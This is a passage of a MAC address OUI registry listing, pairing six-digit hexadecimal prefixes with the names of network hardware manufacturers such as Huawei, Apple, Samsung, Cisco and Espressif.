TECHNOLOGIES CO.,LTD 082802 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD CC4210 Xiaomi Communications Co Ltd A06032 Amcrest Technologies BCAD90 Kymeta Purchasing 4829D6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD FC6A1C Mellanox Technologies, Inc. A088C2 Mellanox Technologies, Inc. 28D0CB Adtran Inc AC51EE Adtran Inc C4FC22 YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 3C998C Houwa System Design Corp. 98F9CC Zhejiang Dahua Technology Co., Ltd. 3868A4 Samsung Electronics Co.,Ltd AC1E92 Samsung Electronics Co.,Ltd B837B2 Aruba, a Hewlett Packard Enterprise Company A88055 Tuya Smart Inc. 508BB9 Tuya Smart Inc. 6CACC2 Samsung Electronics Co.,Ltd BCF730 Samsung Electronics Co.,Ltd BC9307 Samsung Electronics Co.,Ltd 3C3174 Google, Inc. D43F32 eero inc. F83451 Comcast-SRL B4E54C LLC "Elektra" DCC2C9 CANON INC. 44EE14 Texas Instruments B4AC9D Texas Instruments 686372 Huawei Device Co., Ltd. A0C20D Huawei Device Co., Ltd. 4C889E Huawei Device Co., Ltd. E462C4 Cisco Systems, Inc 20DE1E Nokia 607771 Texas Instruments ACB181 Belden Mooresville ACE403 Shenzhen Visteng Technology CO.,LTD F82229 Nokia Shanghai Bell Co., Ltd. 001B8F Cisco Systems, Inc D04F58 Ruckus Wireless A43F51 Shenzhen Benew Technology Co.,Ltd. 503CCA TECNO MOBILE LIMITED 9C0C35 Shenzhenshi Xinzhongxin Technology Co.Ltd 78D6D6 eero inc. DCFBB8 Meizhou Guo Wei Electronics Co., Ltd 443D54 Amazon Technologies Inc. A0A763 Polytron Vertrieb GmbH 6C2316 TATUNG Technology Inc., C8EDFC Shenzhen Ideaform Industrial Product Design Co., Ltd C4DB04 HUAWEI TECHNOLOGIES CO.,LTD 947D77 HUAWEI TECHNOLOGIES CO.,LTD 9409C9 ALPSALPINE CO,.LTD 60D039 Apple, Inc. C4C17D Apple, Inc. E0BDA0 Apple, Inc. 5873D8 Apple, Inc. F4E8C7 Apple, Inc. 148509 Apple, Inc. 5447CC Sagemcom Broadband SAS A41894 Bosch Security Systems B.V. 8CCDFE AMPAK Technology,Inc. 485D35 AVM Audiovisuelles Marketing und Computersysteme GmbH 98ACEF Realme Chongqing Mobile Telecommunications Corp.,Ltd. 24724A Nile Global Inc 00841E Cisco Meraki 24D79C Cisco Systems, Inc 80FBF0 Quectel Wireless Solutions Co.,Ltd. 90BDE6 Quectel Wireless Solutions Co.,Ltd. 546503 Quectel Wireless Solutions Co.,Ltd. F85B9B iMercury 287681 Silicon Laboratories 30FB10 Silicon Laboratories E8473A Hon Hai Precision Industry Co.,LTD D80E29 vivo Mobile Communication Co., Ltd. 000941 Allied Telesis K.K. D4925E Technicolor Delivery Technologies Belgium NV 10BF67 Amazon Technologies Inc. 5858CD Extreme Networks, Inc. FCD5D9 Shenzhen SDMC Technology CO.,Ltd. 90A6BF Quectel Wireless Solutions Co.,Ltd. 500B26 HUAWEI TECHNOLOGIES CO.,LTD 504172 HUAWEI TECHNOLOGIES CO.,LTD B8D0F0 FCNT LMITED AC3EB1 Google, Inc. CCB7C4 HUAWEI TECHNOLOGIES CO.,LTD 5014C1 HUAWEI TECHNOLOGIES CO.,LTD 3C585D Sagemcom Broadband SAS F0C745 TECNO MOBILE LIMITED B46DC2 SHENZHEN BILIAN ELECTRONIC CO.,LTD 18FAB7 Apple, Inc. 7022FE Apple, Inc. 3CFA06 Microsoft Corporation 58E403 Wistron Neweb Corporation 98CCD9 Shenzhen SuperElectron Technology Co.,Ltd. 64D315 HMD Global Oy 606D9D Otto Bock Healthcare Products GmbH 443262 zte corporation F0F69C NIO Co., Ltd. 389592 Tendyron Corporation 4C82A9 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. B06BB3 GRT 881E5A Apple, Inc. 00C585 Apple, Inc. A87CF8 Apple, Inc. 0CAF31 Cisco Systems, Inc 647C34 Ubee Interactive Co., Limited 6C38A1 Ubee Interactive Co., Limited C8E306 eero inc. B8165F LG Innotek 1C6349 Texas Instruments E4521E Texas Instruments 182C65 Texas Instruments 60A2C6 HUAWEI TECHNOLOGIES CO.,LTD A4E8A3 Fujian Newland Auto-ID Tech Co.,Ltd. 84E657 Sony Interactive Entertainment Inc. D4F0C9 KYOCERA Document Solutions Inc. ACCF7B INGRAM MICRO SERVICES FC22F4 Zyxel Communications Corporation 64E833 Espressif Inc. 24B7DA Fiberhome Telecommunication Technologies Co.,LTD 0846C7 Fiberhome Telecommunication Technologies Co.,LTD F87999 Guangdong Jiuzhi Technology Co.,Ltd CC2AAC Yunjing lntelligent Technology(Dongguan).,Ltd 20406A AMPAK Technology,Inc. 4C5BB3 Silicon Laboratories 84DBA4 Huawei Device Co., Ltd. 245CC5 Huawei Device Co., Ltd. 60567D AM Telecom co., Ltd. 78D840 Xiaomi Communications Co Ltd F463FC vivo Mobile Communication Co., Ltd. 205E97 Nokia 048680 Quectel Wireless Solutions Co.,Ltd. B83DFB Bouffalo Lab (Nanjing) Co., Ltd. 5464DE u-blox AG 38BC61 Starkoff Co., Ltd. 10A829 Cisco Systems, Inc B8AB62 Hui Zhou Gaoshengda Technology Co.,LTD C8965A SKY UK LIMITED C8DE41 SKY UK LIMITED 38CA84 HP Inc. EC7427 eero inc. 68E1DC BUFFALO.INC E46017 Intel Corporate 30F6EF Intel Corporate 586D67 Intel Corporate F0EDB8 SERVERCOM (INDIA) PRIVATE LIMITED DCDCC3 Extreme Networks, Inc. 68D40C TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 24E3DE China Telecom Fufu Information Technology Co., Ltd. 686CE6 Microsoft Corporation 003126 Nokia 109826 Nokia C870D4 IBO Technology Co,Ltd 5847CA IEEE Registration Authority 8082F5 STMicrolectronics International NV C0C4F9 Qisda Corporation 1816E8 Siliconware Precision Industries Co., Ltd. CC79D7 Cisco Systems, Inc E4387E Cisco Systems, Inc 90AC3F BrightSign LLC 98348C Teleepoch Ltd 84FB43 Central Denshi Seigyo 5CAC3D Samsung Electronics Co.,Ltd CCE686 Samsung Electronics Co.,Ltd 74190A Samsung Electronics Co.,Ltd 68F543 HUAWEI TECHNOLOGIES CO.,LTD F4F19E Wistron InforComm (Zhongshan) Corporation 104C43 Fiberhome Telecommunication Technologies Co.,LTD D88332 TaiXin Semiconductor Co., Ltd 74249F TIBRO Corp. 18C3F4 IEEE Registration Authority 34DF20 Shenzhen Comstar .Technology Co.,Ltd 68275F zte corporation 4441F0 zte corporation 448EEC China Mobile Group Device Co.,Ltd. F026F8 Worldcns Co.,Ltd. 140708 CP PLUS GMBH & CO. KG F85B6E Samsung Electronics Co.,Ltd 282BB9 Shenzhen Xiongxin Technology Co.,Ltd 301ABA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 68871C Motorola Mobility LLC, a Lenovo Company F8A475 PT Indoreka Jaya Wutama 647CE8 Palo Alto Networks F41AB0 Shenzhen Xingguodu Technology Co., Ltd. A47952 Huawei Device Co., Ltd. B87CD0 Huawei Device Co., Ltd. D07E01 Huawei Device Co., Ltd. F87907 Huawei Device Co., Ltd. 7CE87F Sagemcom Broadband SAS 8C6A3B Samsung Electronics Co.,Ltd 241153 Samsung Electronics Co.,Ltd 48D35D Private 889CAD Cisco Systems, Inc 1449D4 Xiaomi Communications Co Ltd 14D424 AzureWave Technology Inc. 00A093 B/E AEROSPACE, Inc. 2C7600 Apple, Inc. F87D76 Apple, Inc. 40FDF3 AMPAK Technology,Inc. 946DAE Mellanox Technologies, Inc. E0F318 Sichuan Tianyi Comheart Telecom Co.,LTD C464F2 Infinix mobility limited B01F47 Heights Telecom T ltd 282947 Chipsea Technologies (Shenzhen) Corp. ACBCB5 Apple, Inc. 082573 Apple, Inc. AC007A Apple, Inc. F01FC7 Apple, Inc. B43A31 Silicon Laboratories 7042D3 Ruijie Networks Co.,LTD 441244 Aruba, a Hewlett Packard Enterprise Company 387C76 Universal Global Scientific Industrial Co., Ltd. E4A634 Universal Electronics, Inc. 2C8D37 Virtium ACB687 Arcadyan Corporation 506391 HUAWEI TECHNOLOGIES CO.,LTD E8A34E HUAWEI TECHNOLOGIES CO.,LTD 041892 HUAWEI TECHNOLOGIES CO.,LTD 88200D Apple, Inc. BC1541 Nokia 14656A HUAWEI TECHNOLOGIES CO.,LTD 6CB7E2 HUAWEI TECHNOLOGIES CO.,LTD C475EA HUAWEI TECHNOLOGIES CO.,LTD 9025F2 HUAWEI TECHNOLOGIES CO.,LTD 0084ED LEXMARK INTERNATIONAL, INC. ECE61D Huawei Device Co., Ltd. 4C63AD Huawei Device Co., Ltd. DCDB27 Huawei Device Co., Ltd. 640E6A SECO-LARM USA Inc 8C5109 IEEE Registration Authority 68E154 SiMa.ai 6C60D0 Huawei Device Co., Ltd. E8EF05 MIND TECH INTERNATIONAL LIMITED 6C724A Onkyo Technology K.K. D8FFC3 Shenzhen 3SNIC information technology company Limited F08756 Zyxel Communications Corporation 8C255E VoltServer 58B38F New H3C Technologies Co., Ltd 40E171 Jiangsu Huitong Group Co.,Ltd. 4827E2 Espressif Inc. 18C300 Nokia D44D77 Nokia F46D3F Intel Corporate DC8DB7 ATW TECHNOLOGY, INC. B88F27 Realme Chongqing Mobile Telecommunications Corp.,Ltd. DC0539 Cisco Systems, Inc 3886F7 Google, Inc. F4227A Guangdong Seneasy Intelligent Technology Co., Ltd. 543D92 WIRELESS-TEK TECHNOLOGY LIMITED 94D331 Xiaomi Communications Co Ltd D4430E Zhejiang Dahua Technology Co., Ltd. E8AC23 HUAWEI TECHNOLOGIES CO.,LTD 68D927 HUAWEI TECHNOLOGIES CO.,LTD 90F970 HUAWEI TECHNOLOGIES CO.,LTD 04CAED HUAWEI TECHNOLOGIES CO.,LTD 68EE88 Shenzhen TINNO Mobile Technology Corp. 2C3B70 AzureWave Technology Inc. 601E98 Axevast Technology 5C8C30 Taicang T&W Electronics 34DD04 Minut AB 9826AD Quectel Wireless Solutions Co.,Ltd. A8F7D9 Mist Systems, Inc. 448816 Cisco Systems, Inc 2C9D65 vivo Mobile Communication Co., Ltd. A475B9 Samsung Electronics Co.,Ltd 80549C Samsung Electronics Co.,Ltd 1CF8D0 Samsung Electronics Co.,Ltd 4C9D22 ACES Co.,Ltd 88C9E8 Sony Corporation B8F0B9 zte corporation F85E0B Realme Chongqing Mobile Telecommunications Corp.,Ltd. 74767D shenzhen kexint technology co.,ltd E048D8 Guangzhi Wulian Technology(Guangzhou) Co., Ltd 18BB1C Huawei Device Co., Ltd. D88863 HUAWEI TECHNOLOGIES CO.,LTD C03E50 HUAWEI TECHNOLOGIES CO.,LTD 806036 HUAWEI TECHNOLOGIES CO.,LTD F8E4A4 Fiberhome Telecommunication Technologies Co.,LTD 805B65 LG Innotek B038E2 Wanan Hongsheng Electronic Co.Ltd 4C5369 YanFeng Visteon(ChongQing) Automotive Electronic Co.,Ltd A0C98B Nokia Solutions and Networks GmbH & Co. KG 70A983 Cisco Systems, Inc BCFAEB Cisco Systems, Inc 848553 Biznes Systema Telecom, LLC B47D76 KNS Group LLC C0AD97 TECNO MOBILE LIMITED 580032 Genexis B.V. BCC7DA Earda Technologies co Ltd 1866F0 Jupiter Systems 74604C RODE 286F40 Tonly Technology Co. Ltd 0C86C7 Jabil Circuit (Guangzhou) Limited 607D09 Luxshare Precision Industry Co., Ltd EC6260 Espressif Inc. B06E72 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 24CF24 Beijing Xiaomi Mobile Software Co., Ltd F06C5D Xiaomi Communications Co Ltd 0C7BC8 Cisco Meraki C8F09E Espressif Inc. DC5475 Espressif Inc. 001401 Rivertree Networks Corp. 006068 Dialogic Corporation 90D473 vivo Mobile Communication Co., Ltd. 40B02F Miele & Cie. KG 1C5974 IEEE Registration Authority 1C0D7D Apple, Inc. 14F287 Apple, Inc. 585595 Apple, Inc. 14946C Apple, Inc. 787104 Sichuan Tianyi Comheart Telecom Co.,LTD A0EDFB Quectel Wireless Solutions Co.,Ltd. B02347 Shenzhen Giant Microelectronics Company Limited 183C98 Shenzhen Hengyi Technology Co., LTD D81068 Murata Manufacturing Co., Ltd. 5C045A Company NA Stage & Light 58C356 EM Microelectronic F4E204 COYOTE SYSTEM F84E58 Samsung Electronics Co.,Ltd B47064 Samsung Electronics Co.,Ltd 4C2E5E Samsung Electronics Co.,Ltd 5CA4F4 zte corporation D4E053 Aruba, a Hewlett Packard Enterprise Company 88FC5D Cisco Systems, Inc 645DF4 Samsung Electronics Co.,Ltd 0016A3 INGETEAM 883F0C system a.v. co., ltd. C8BE35 Extreme Networks, Inc. 64C582 China Mobile Group Device Co.,Ltd. 50284A Intel Corporate 303EA7 Intel Corporate 246C60 Huawei Device Co., Ltd. F4C88A Intel Corporate CCDD58 Robert Bosch GmbH 28827C Bosch Automative products(Suzhou)Co.,Ltd Changzhou Branch CC3E79 ARRIS Group, Inc. 28F5D1 ARRIS Group, Inc. 10E177 ARRIS Group, Inc. 08EBF6 HUAWEI TECHNOLOGIES CO.,LTD EC6073 TP-LINK TECHNOLOGIES CO.,LTD. 74DDCB China Leadshine Technology Co.,Ltd 104D15 Viaanix Inc 50A015 Shenzhen Yipingfang Network Technology Co., Ltd. AC330B Japan Computer Vision Corp. 3053C1 CRESYN BC6193 Xiaomi Communications Co Ltd F8E57E Cisco Systems, Inc CC827F Advantech Technology (CHINA) Co., Ltd. 78AF08 Intel Corporate DCA956 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7085C4 Ruijie Networks Co.,LTD B0AFF7 Shenzhen Yipingfang Network Technology Co., Ltd. 4827C5 HUAWEI TECHNOLOGIES CO.,LTD BCD206 HUAWEI TECHNOLOGIES CO.,LTD 14755B Intel Corporate 5CC563 HUNAN FN-LINK TECHNOLOGY LIMITED C854A4 Infinix mobility limited A0092E zte corporation A8B13B HP Inc. C43875 Sonos, Inc. 68B691 Amazon Technologies Inc. 885046 LEAR 0826AE IEEE Registration Authority 744687 Kingsignal Technology Co., Ltd. 3C5D29 Zhejiang Tmall Technology Co., Ltd. 68FCCA Samsung Electronics Co.,Ltd 6CD719 Fiberhome Telecommunication Technologies Co.,LTD 80015C Synaptics, Inc CCEB18 OOO "TSS" 385B44 Silicon Laboratories 943469 Silicon Laboratories E0BB0C Synertau LLC 0010E6 APPLIED INTELLIGENT SYSTEMS, INC. 886F29 Pocketbook International SA BC2247 New H3C Technologies Co., Ltd 70041D Espressif Inc. 7CDAC3 Sichuan Tianyi Comheart Telecom Co.,LTD 000813 Diskbank, Inc. AC77B9 Nanjing Yufei Intelligent Control Technology Co.,LTD A85BB7 Apple, Inc. 3462B4 Renesas Electronics (Penang) Sdn. Bhd. 8C17B6 Huawei Device Co., Ltd. B82B68 Huawei Device Co., Ltd. 2CF295 Huawei Device Co., Ltd. 704CB6 Shenzhen SuperElectron Technology Co.,Ltd. 549B49 NEC Platforms, Ltd. 882510 Aruba, a Hewlett Packard Enterprise Company D0E828 Radiant Industries Incorporated 107636 Earda Technologies co Ltd 78482C START USA, INC. 7C45D0 Shenzhen Wewins Wireless Co., ltd 74EF4B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F4F70C Avang - neterbit 20AF1B SteelSeries ApS 8C477F NambooSolution 482E72 Cisco Systems, Inc 30CBC7 Cambium Networks Limited 244CAB Espressif Inc. E04102 zte corporation 7C7716 Zyxel Communications Corporation 943FBB JSC RPC Istok named after Shokin 50E7B7 vivo Mobile Communication Co., Ltd. 448C00 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 18C293 Laird Connectivity 000AC2 Wuhan FiberHome Digital Technology Co.,Ltd. F0BE25 Dongguan Cannice Precision Manufacturing Co., Ltd. 149BD7 MULI MUWAI FURNITURE QIDONG CO., LTD F4442C Shenzhen SuperElectron Technology Co.,Ltd. D84008 HUAWEI TECHNOLOGIES CO.,LTD 6C047A HUAWEI TECHNOLOGIES CO.,LTD 6C558D HUAWEI TECHNOLOGIES CO.,LTD A42A95 D-Link International E0FFF1 Texas Instruments 04FF08 Huawei Device Co., Ltd. 00A45F Huawei Device Co., Ltd. FCE26C Apple, Inc. 4C7975 Apple, Inc. 1C7125 Apple, Inc. 34FE77 Apple, Inc. 6CE5C9 Apple, Inc. 74B7E6 Zegna-Daidong Limited 3CA161 HUAWEI TECHNOLOGIES CO.,LTD A083B4 HeNet B.V. 3C8B7F Cisco Systems, Inc C0F87F Cisco Systems, Inc 5C8E8B Shenzhen Linghai Electronics Co.,Ltd ECDA59 New H3C Technologies Co., Ltd 98B785 Shenzhen 10Gtek Transceivers Co., Limited 485AEA Fiberhome Telecommunication Technologies Co.,LTD 848102 Fiberhome Telecommunication Technologies Co.,LTD 54E005 Fiberhome Telecommunication Technologies Co.,LTD 4C53FD Amazon Technologies Inc. 587DB6 Northern Data AG 9075BC Nokia Shanghai Bell Co., Ltd. 9C0B05 eero inc. 40F6BC Amazon Technologies Inc. 10B1DF CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. F4F647 zte corporation E88175 zte corporation DC9758 Sichuan AI-Link Technology Co., Ltd. 78F238 Samsung Electronics Co.,Ltd 64D0D6 Samsung Electronics Co.,Ltd 78EB46 HUAWEI TECHNOLOGIES CO.,LTD C416C8 HUAWEI TECHNOLOGIES CO.,LTD E4DCCC HUAWEI TECHNOLOGIES CO.,LTD 000931 Future Internet, Inc. B8F255 Universal Electronics, Inc. EC656E The Things Industries B.V. 5C49FA Shenzhen Guowei Shidai Communication Equipement Co., Ltd 10AEA5 Duskrise inc. 94944A Particle Industries Inc. 1466B7 Advanced Design Technology Pty Ltd 2CA327 Oraimo Technology Limited 047975 Honor Device Co., Ltd. 9C0567 Honor Device Co., Ltd. 782184 Espressif Inc. 341343 GE Lighting FC0FE7 Microchip Technology Inc. C85CCC Beijing Xiaomi Mobile Software Co., Ltd 4873CB Tiinlab Corporation 789FAA Huawei Device Co., Ltd. E8A72F Microsoft Corporation D405DE eero inc. FC777B Hitron Technologies. Inc 14172A Fiberhome Telecommunication Technologies Co.,LTD 005FBF Toshiba Corp. 38384B vivo Mobile Communication Co., Ltd. 38BEAB AltoBeam (China) Inc. 70FD88 Nanjing Jiahao Technology Co., Ltd. 98192C Edgecore Networks Corporation 080004 CROMEMCO INCORPORATED AC8B6A China Mobile IOT Company Limited B89EA6 SPBEC-MINING CO.LTD E07E5F Renesas Electronics (Penang) Sdn. Bhd. B08B92 zte corporation 08C8C2 GN Audio A/S 185880 Arcadyan Corporation 3083D2 Motorola Mobility LLC, a Lenovo Company AC50DE CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 00DDB6 New H3C Technologies Co., Ltd 000056 DR. B. STRUCK 549F06 Nokia Shanghai Bell Co., Ltd. 68A878 GeoWAN Pty Ltd 409B21 Nokia 94B34F Ruckus Wireless C0F9D2 arkona technologies GmbH 140A29 Tiinlab Corporation 301A30 Mako Networks Ltd C48BA3 Cisco Meraki 38A91C New H3C Technologies Co., Ltd F4700C IEEE Registration Authority 4C445B Intel Corporate C8CA79 Ciena Corporation 68E478 Qingdao Haier Technology Co.,Ltd E09D13 Samsung Electronics Co.,Ltd 88231F Fibocom Wireless Inc. A4DE26 Sumitomo Electric Industries, Ltd 307BC9 SHENZHEN BILIAN ELECTRONIC CO.,LTD 046865 Apple, Inc. DC5392 Apple, Inc. 1CB3C9 Apple, Inc. FCAA81 Apple, Inc. 609316 Apple, Inc. 646D2F Apple, Inc. D4EEDE Sichuan Tianyi Comheart Telecom Co.,LTD C08B05 HUAWEI TECHNOLOGIES CO.,LTD 24CE33 Amazon Technologies Inc. 0CDDEF Nokia Corporation 5C9666 Sony Interactive Entertainment Inc. 241281 China Mobile Group Device Co.,Ltd. 50C0F0 Artek Microelectronics Co.,Ltd. B4AE2B Microsoft 7C726E Ericsson AB BC6EE2 Intel Corporate 9CC2C4 Inspur Electronic Information Industry Co.,Ltd. 042084 zte corporation B45F84 zte corporation 00DF1D Cisco Systems, Inc A00F37 Cisco Systems, Inc 787264 IEEE Registration Authority 1097BD Espressif Inc. 387A0E Intel Corporate B01C0C SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 68403C Fiberhome Telecommunication Technologies Co.,LTD 903E7F Fiberhome Telecommunication Technologies Co.,LTD 14C0A1 UCloud Technology Co., Ltd. C03653 eero inc. 78670E Wistron Neweb Corporation DC0E96 Palo Alto Networks 30C6F7 Espressif Inc. 9460D5 Aruba, a Hewlett Packard Enterprise Company 080205 HUAWEI TECHNOLOGIES CO.,LTD 643216 Weidu Technology (Beijing) Co., Ltd. DC84E9 Shenzhen Qihoo Intelligent Technology Co.,Ltd B894E7 Xiaomi Communications Co Ltd 34B98D Xiaomi Communications Co Ltd 940230 Logitech 701135 Livesecu co., Ltd C06B55 Motorola Mobility LLC, a Lenovo Company DCE55B Google, Inc. 4CB9EA iRobot Corporation 9035EA Silicon Laboratories FCA84A Sentinum GmbH 6C3C7C CANON INC. 90B622 Samsung Electronics Co.,Ltd 0C02BD Samsung Electronics Co.,Ltd 2CD1DA Keysight Technologies, Inc. C4FCEF SambaNova Systems, Inc. 3484E4 Texas Instruments AC4D16 Texas Instruments B010A0 Texas Instruments F0704F Samsung Electronics Co.,Ltd AC6C90 Samsung Electronics Co.,Ltd 1C5EE6 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD. 346F24 AzureWave Technology Inc. DC9166 Huawei Device Co., Ltd. AC80D6 Hexatronic AB 304F00 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B4AC8C Bern University of Applied Sciences BCCE25 Nintendo Co.,Ltd C4D7FD Bouffalo Lab (Nanjing) Co., Ltd. A41A3A TP-LINK TECHNOLOGIES CO.,LTD. 0C8408 HUAWEI TECHNOLOGIES CO.,LTD A09F7A D-Link Middle East FZCO B42046 eero inc. E86E44 zte corporation 00E7E3 zte corporation 9C54C2 New H3C Technologies Co., Ltd 78E9CF TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 000D67 Ericsson 24D7EB Espressif Inc. FC1D2A vivo Mobile Communication Co., Ltd. 1CED6F AVM Audiovisuelles Marketing und Computersysteme GmbH D81F12 Tuya Smart Inc. 204B22 Sunnovo International Limited C81CFE Zebra Technologies Inc. B06A41 Google, Inc. 507B9D LCFC(HeFei) Electronics Technology co., ltd 28D244 LCFC(HeFei) Electronics Technology co., ltd 9009D0 Synology Incorporated A0D05B Samsung Electronics Co.,Ltd 04D442 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 1C05B7 Chongqing Trantor Technology Co., Ltd. 5C5230 Apple, Inc. 645A36 Apple, Inc. 6C71D2 HUAWEI TECHNOLOGIES CO.,LTD F800A1 HUAWEI TECHNOLOGIES CO.,LTD D876AE HUAWEI TECHNOLOGIES CO.,LTD 2032C6 Apple, Inc. 141973 Beijing Yunyi Times Technology Co.,Ltd 5C75C6 China Mobile Group Device Co.,Ltd. 546F71 uAvionix Corporation 54EF33 SHENZHEN BILIAN ELECTRONIC CO.,LTD 4448B9 MitraStar Technology Corp. 9CD57D Cisco Systems, Inc CCE236 Hangzhou Yaguan Technology Co. LTD 58BF25 Espressif Inc. 7066E1 dnt Innovation GmbH F8CE72 Wistron Corporation CC9DA2 Eltex Enterprise Ltd. B437D8 D-Link (Shanghai) Limited Corp. 000A02 ANNSO CO., LTD. 000FE5 MERCURY SECURITY CORPORATION 74765B Quectel Wireless Solutions Co.,Ltd. 204181 ESYSE GmbH Embedded Systems Engineering 80D2E5 Nintendo Co.,Ltd 605375 HUAWEI TECHNOLOGIES CO.,LTD 78DD33 HUAWEI TECHNOLOGIES CO.,LTD A031DB HUAWEI TECHNOLOGIES CO.,LTD 941F3A Ambiq DCBB96 Full Solution Telecom A01842 Comtrend Corporation 48188D WEIFANG GOERTEK ELECTRONICS CO.,LTD 80FBF1 Freescale Semiconductor (China) Ltd. 38D57A CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. A0445C HUAWEI TECHNOLOGIES CO.,LTD 646D4E HUAWEI TECHNOLOGIES CO.,LTD 085C1B HUAWEI TECHNOLOGIES CO.,LTD 509A88 HUAWEI TECHNOLOGIES CO.,LTD B83BCC Xiaomi Communications Co Ltd D09CAE vivo Mobile Communication Co., Ltd. 506F0C Sagemcom Broadband SAS 88D199 Vencer Co., Ltd. 7C87CE Espressif Inc. 8C8172 Sichuan Tianyi Comheart Telecom Co.,LTD 70A56A Shenzhen C-Data Technology Co., Ltd. 303FBB Hewlett Packard Enterprise 701F0B WILOGY SRL D48660 Arcadyan Corporation 08E7E5 Huawei Device Co., Ltd. 487397 New H3C Technologies Co., Ltd 745D43 BSH Hausgeraete GmbH 000BA5 Quasar Cipta Mandiri, PT 44E517 Intel Corporate 40406C Icomera 043926 China Dragon Technology Limited 70CD0D Intel Corporate 5C0CE6 Nintendo Co.,Ltd 547787 Earda Technologies co Ltd 002704 Accelerated Concepts, Inc D0C24E Samsung Electronics Co.,Ltd 345B98 EM Microelectronic D04DC6 Aruba, a Hewlett Packard Enterprise Company 08FF44 Apple, Inc. 1856C3 Apple, Inc. 6881E0 HUAWEI TECHNOLOGIES CO.,LTD 4CD629 HUAWEI TECHNOLOGIES CO.,LTD F0C478 HUAWEI TECHNOLOGIES CO.,LTD B88D12 Apple, Inc. 080037 FUJIFILM Business Innovation Corp. 888E7F ATOP CORPORATION E8EDD6 Fortinet, Inc. 1C93C4 Amazon Technologies Inc. AC49DB Apple, Inc. 44F09E Apple, Inc. 003059 Kontron Europe GmbH D86D17 HUAWEI TECHNOLOGIES CO.,LTD 7C1AC0 HUAWEI TECHNOLOGIES CO.,LTD 489EBD HP Inc. 00269C ITUS JAPAN CO. LTD 28FA19 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd B8A14A Raisecom Technology CO.,LTD BCA37F Rail-Mil Sp. z o.o. Sp. K. 5009E5 Drimsys,Inc 203CC0 Beijing Tosee Technology Co., Ltd. 28DFEB Intel Corporate 88FCA6 devolo AG D8A011 WiZ 78D6DC Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 0C4314 Silicon Laboratories F4C02F BlueBite 9CDC71 Hewlett Packard Enterprise E8DA00 Kivo Technology, Inc. C48025 Huawei Device Co., Ltd. B8145C Huawei Device Co., Ltd. C89D18 Huawei Device Co., Ltd. DC0398 LG Innotek 508A06 Tuya Smart Inc. D40868 Beijing Lanxum Computer Technology CO.,LTD. A47806 Cisco Systems, Inc B8D56B Mirka Ltd. CCB5D1 Beijing Xiaomi Mobile Software Co., Ltd EC8AC4 Amazon Technologies Inc. 78B84B Sichuan Tianyi Comheart Telecom Co.,LTD D44165 Sichuan Tianyi Comheart Telecom Co.,LTD 7886B6 Shenzhen YOUHUA Technology Co., Ltd 28FBAE HUAWEI TECHNOLOGIES CO.,LTD 88A0BE HUAWEI TECHNOLOGIES CO.,LTD 949010 HUAWEI TECHNOLOGIES CO.,LTD 98F083 HUAWEI TECHNOLOGIES CO.,LTD 8C64A2 OnePlus Technology (Shenzhen) Co., Ltd D05475 SAVI Controls 001FC8 Up-Today Industrial Co., Ltd. 10381F Sichuan AI-Link Technology Co., Ltd. 5414F3 Intel Corporate ECB4E8 Wistron Mexico SA de CV 8C367A Palo Alto Networks 6CFE54 Intel Corporate 30A612 ShenZhen Hugsun Technology Co.,Ltd. 18BB41 Huawei Device Co., Ltd. 7818A8 Huawei Device Co., Ltd. 7CCC1F Sichuan Tianyi Comheart Telecom Co.,LTD FC372B Sichuan Tianyi Comheart Telecom Co.,LTD 248BE0 Sichuan Tianyi Comheart Telecom Co.,LTD 5C4A1F Sichuan Tianyi Comheart Telecom Co.,LTD 54E061 Sichuan Tianyi Comheart Telecom Co.,LTD 187532 Sichuan Tianyi Comheart Telecom Co.,LTD 9C9C40 Sichuan Tianyi Comheart Telecom Co.,LTD 4C3B6C GARO AB 5CC8E3 Shintec Hozumi co.ltd. 086AC5 Intel Corporate 807264 Huawei Device Co., Ltd. E8F654 HUAWEI TECHNOLOGIES CO.,LTD 2087EC HUAWEI TECHNOLOGIES CO.,LTD 54F6E2 HUAWEI TECHNOLOGIES CO.,LTD A85081 HUAWEI TECHNOLOGIES CO.,LTD 3C7AC4 Chemtronics 68DDD9 HMD Global Oy 3C195E Samsung Electronics Co.,Ltd 101EDA INGENICO TERMINALS SAS 1CFF59 Sichuan Tianyi Comheart Telecom Co.,LTD C01B23 Sichuan Tianyi Comheart Telecom Co.,LTD 6C9466 Intel Corporate 109497 Logitech Hong Kong F02F4B Apple, Inc. 40E64B Apple, Inc. B4FA48 Apple, Inc. F4B1C2 Zhejiang Dahua Technology Co., Ltd. D47798 Cisco Systems, Inc 10C9CA Ace Technology Corp. BCFAB8 Guangzhou Shiyuan Electronic Technology Company Limited 60A4B7 TP-Link Corporation Limited 38AFD0 Nevro 943CC6 Espressif Inc. A4DAD4 Yamato Denki Co.,Ltd. A45802 SHIN-IL TECH 0015E5 Cheertek Inc. 8C83FC Axioma Metering UAB A0D7A0 Huawei Device Co., Ltd. E0DA90 HUAWEI TECHNOLOGIES CO.,LTD A4A46B HUAWEI TECHNOLOGIES CO.,LTD C04754 vivo Mobile Communication Co., Ltd. 8CD9D6 Xiaomi Communications Co Ltd 60C5E6 Skullcandy 38F3FB Asperiq FC97A8 Cricut Inc. 00A00E NETSCOUT SYSTEMS INC 04C29B Aura Home, Inc. 1409B4 zte corporation 101081 zte corporation 8044FD China Mobile (Hangzhou) Information Technology Co., Ltd. 50AE86 Linkintec Co., Ltd 601592 IEEE Registration Authority 143B42 Realfit(Shenzhen) Intelligent Technology 